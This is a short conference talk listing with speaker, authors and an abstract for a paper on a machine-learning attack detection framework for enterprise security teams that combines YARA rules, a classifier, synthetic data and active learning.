Sadegh Momeni

Democratizing ML for Enterprise Security: A Self-Sustained Attack Detection Framework

Speaker: Sadegh Momeni

Author(s): Sadegh Momeni; Ge Zhang; Birkett Huber ; Hamza Harkous; Sam Lipton; Benoit Seguin; Yanis Pavlidis

Abstract: This paper proposes a two-stage hybrid framework for ML-based threat detection in enterprise security, combining loose YARA rules with an ML classifier and leveraging synthetic data generation (Simula) and active learning to achieve a self-sustained, low-overhead solution for SOCs.